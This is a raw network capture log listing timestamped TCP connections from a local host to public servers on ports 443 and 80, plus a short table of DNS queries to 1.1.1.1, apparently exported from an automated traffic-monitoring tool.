                                    Nov 27, 2024 23:06:52.325757027 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.326639891 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:52.326653957 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:52.516537905 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:52.516596079 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:52.516679049 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:53.214256048 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.214350939 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.214382887 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.214421034 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.214448929 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.214500904 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.222867012 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.231182098 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.231214046 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.231276989 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.231285095 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.231349945 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.239845037 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.282762051 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.282771111 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.330765963 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.338030100 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.342308998 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.342386007 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.342392921 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.393758059 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.424233913 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.434432983 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.434535980 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.434540987 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.434550047 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.434597969 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.442313910 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.450292110 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.450387955 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.450395107 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.458571911 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.458646059 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.458666086 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.466197968 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.466272116 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.466290951 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.474200964 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.474262953 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.474280119 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.482162952 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.482227087 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.482233047 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.488502979 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.488560915 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.488565922 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.500806093 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.500876904 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.500881910 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.506902933 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.506958961 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.507066965 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.507075071 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.507121086 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.513118982 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.519397020 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.519458055 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.519469976 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.568747044 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.586266041 CET49706443192.168.2.16162.159.140.229
                                    Nov 27, 2024 23:06:53.586297989 CET44349706162.159.140.229192.168.2.16
                                    Nov 27, 2024 23:06:53.634422064 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.638731003 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.638822079 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.638828993 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.642716885 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.642765045 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.642771959 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.652877092 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.652954102 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.653037071 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.653043985 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.653090954 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.657114029 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.657215118 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.657263041 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.657269001 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686745882 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686753988 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686814070 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686835051 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686845064 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686867952 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.686885118 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686917067 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.686939955 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.703141928 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.703177929 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.703213930 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.703223944 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.703248024 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.703267097 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.707557917 CET49726443192.168.2.16151.101.2.137
                                    Nov 27, 2024 23:06:53.707570076 CET44349726151.101.2.137192.168.2.16
                                    Nov 27, 2024 23:06:53.840316057 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:06:53.971524954 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:53.971853971 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:53.971878052 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:53.972371101 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:53.972685099 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:53.972776890 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:53.972867012 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:54.019331932 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:54.158813000 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:06:54.523186922 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:54.523226023 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:54.523291111 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:54.523302078 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:54.523356915 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:54.524355888 CET49731443192.168.2.16185.15.58.240
                                    Nov 27, 2024 23:06:54.524369955 CET44349731185.15.58.240192.168.2.16
                                    Nov 27, 2024 23:06:55.627830982 CET49673443192.168.2.16204.79.197.203
                                    Nov 27, 2024 23:06:58.646763086 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:07:03.765830040 CET49678443192.168.2.1620.189.173.10
                                    Nov 27, 2024 23:07:08.255857944 CET4968080192.168.2.16192.229.211.108
                                    Nov 27, 2024 23:07:24.275672913 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:24.275723934 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:24.275814056 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:24.276169062 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:24.276182890 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.051358938 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.051459074 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.053183079 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.053193092 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.053509951 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.054853916 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.099334002 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.760068893 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.760108948 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.760127068 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.760196924 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.760231018 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.760286093 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804574013 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.804620981 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.804665089 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804676056 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.804687023 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.804708004 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804742098 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804786921 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804800987 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:26.804811954 CET49733443192.168.2.164.175.87.197
                                    Nov 27, 2024 23:07:26.804816961 CET443497334.175.87.197192.168.2.16
                                    Nov 27, 2024 23:07:30.853316069 CET4969780192.168.2.1693.184.221.240
                                    Nov 27, 2024 23:07:30.853385925 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:07:30.977554083 CET804969793.184.221.240192.168.2.16
                                    Nov 27, 2024 23:07:30.977612019 CET4969780192.168.2.1693.184.221.240
                                    Nov 27, 2024 23:07:30.977978945 CET8049699199.232.214.172192.168.2.16
                                    Nov 27, 2024 23:07:30.978037119 CET4969980192.168.2.16199.232.214.172
                                    Nov 27, 2024 23:07:40.231862068 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:40.231920958 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:40.232141018 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:40.232276917 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:40.232296944 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:41.892612934 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:41.892647028 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:41.892875910 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:41.893035889 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:41.893047094 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:41.978143930 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:41.978517056 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:41.978576899 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:41.978945971 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:41.979242086 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:41.979331017 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:42.019870996 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:43.158149004 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.158415079 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.158427954 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.159342051 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.159415007 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.159691095 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.159744978 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.159809113 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.159815073 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.201773882 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.637651920 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.637722015 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.637778997 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.637917995 CET49736443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.637934923 CET4434973635.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.638361931 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.638478994 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:43.638566017 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.638793945 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:43.638828993 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.856797934 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.857089043 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:44.857146978 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.857471943 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.857770920 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:44.857845068 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.857892990 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:44.896874905 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:44.896917105 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:44.896996021 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:44.897370100 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:44.897386074 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:44.903342009 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:44.909802914 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:45.326553106 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:45.326762915 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:45.326847076 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:45.327369928 CET49737443192.168.2.1635.190.80.1
                                    Nov 27, 2024 23:07:45.327413082 CET4434973735.190.80.1192.168.2.16
                                    Nov 27, 2024 23:07:46.169230938 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:46.169492960 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.169507027 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:46.170360088 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:46.170447111 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.170718908 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.170731068 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.170773029 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.170783997 CET44349738172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:46.170844078 CET49738443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.171031952 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.171067953 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:46.171156883 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.171338081 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:46.171350956 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.434585094 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.434915066 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:47.434937000 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.435802937 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.435866117 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:47.436256886 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:47.436309099 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.436436892 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:47.436444044 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:47.487793922 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:48.269562960 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:48.269610882 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:48.269675016 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:48.271025896 CET49739443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:48.271040916 CET44349739172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:51.684313059 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:51.684382915 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:51.684492111 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:53.582195044 CET49735443192.168.2.16142.250.181.68
                                    Nov 27, 2024 23:07:53.582267046 CET44349735142.250.181.68192.168.2.16
                                    Nov 27, 2024 23:07:58.459122896 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:58.459170103 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:58.459249020 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:58.459561110 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:58.459583998 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.771531105 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.771789074 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.771819115 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.772777081 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.772852898 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773109913 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773122072 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773161888 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773175001 CET44349740172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.773232937 CET49740443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773428917 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773461103 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:07:59.773540974 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773704052 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:07:59.773715973 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.039254904 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.039530993 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:01.039546013 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.039865017 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.040208101 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:01.040271997 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.040354967 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:01.083333015 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.875746012 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.875823021 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:01.875868082 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:01.876317024 CET49741443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:01.876329899 CET44349741172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:13.725981951 CET49695443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:08:13.726025105 CET4969680192.168.2.16192.229.221.95
                                    Nov 27, 2024 23:08:13.850430965 CET4434969520.190.147.3192.168.2.16
                                    Nov 27, 2024 23:08:13.850475073 CET8049696192.229.221.95192.168.2.16
                                    Nov 27, 2024 23:08:13.850619078 CET4969680192.168.2.16192.229.221.95
                                    Nov 27, 2024 23:08:13.850622892 CET49695443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:08:18.611895084 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:08:18.736134052 CET4434969820.190.147.3192.168.2.16
                                    Nov 27, 2024 23:08:18.736241102 CET49698443192.168.2.1620.190.147.3
                                    Nov 27, 2024 23:08:27.742280006 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:27.742320061 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:27.742454052 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:27.742754936 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:27.742768049 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.205451012 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.205841064 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.205863953 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.206760883 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.206847906 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207154989 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207173109 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207212925 CET44349743172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.207215071 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207277060 CET49743443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207498074 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207525015 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:29.207616091 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207803011 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:29.207817078 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.474344969 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.474631071 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:30.474649906 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.475738049 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.475830078 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:30.476109982 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:30.476176023 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.476268053 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:30.476275921 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:30.520801067 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:31.310724020 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:31.310797930 CET44349744172.67.157.254192.168.2.16
                                    Nov 27, 2024 23:08:31.310885906 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:31.311567068 CET49744443192.168.2.16172.67.157.254
                                    Nov 27, 2024 23:08:31.311577082 CET44349744172.67.157.254192.168.2.16
                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 27, 2024 23:06:35.476305962 CET53573621.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:35.485477924 CET53495201.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:36.275388956 CET5864453192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:36.275747061 CET4942953192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:36.416260958 CET53586441.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:36.417354107 CET53494291.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:38.249912024 CET53519841.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:38.393116951 CET5085953192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:38.393357992 CET5620153192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:38.735482931 CET53562011.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:38.735769987 CET53508591.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:40.170015097 CET6024053192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:40.170145988 CET6445053192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:40.311295986 CET53602401.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:40.311342001 CET53644501.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:41.885157108 CET5872153192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:41.885309935 CET5989353192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:42.028382063 CET53598931.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:42.029949903 CET53587211.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:45.240921021 CET6106853192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:45.241091013 CET6152453192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:45.384087086 CET53615241.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:45.384876966 CET53610681.1.1.1192.168.2.16
                                    Nov 27, 2024 23:06:47.587229013 CET5324253192.168.2.161.1.1.1
                                    Nov 27, 2024 23:06:47.587368011 CET6232053192.168.2.161.1.1.1
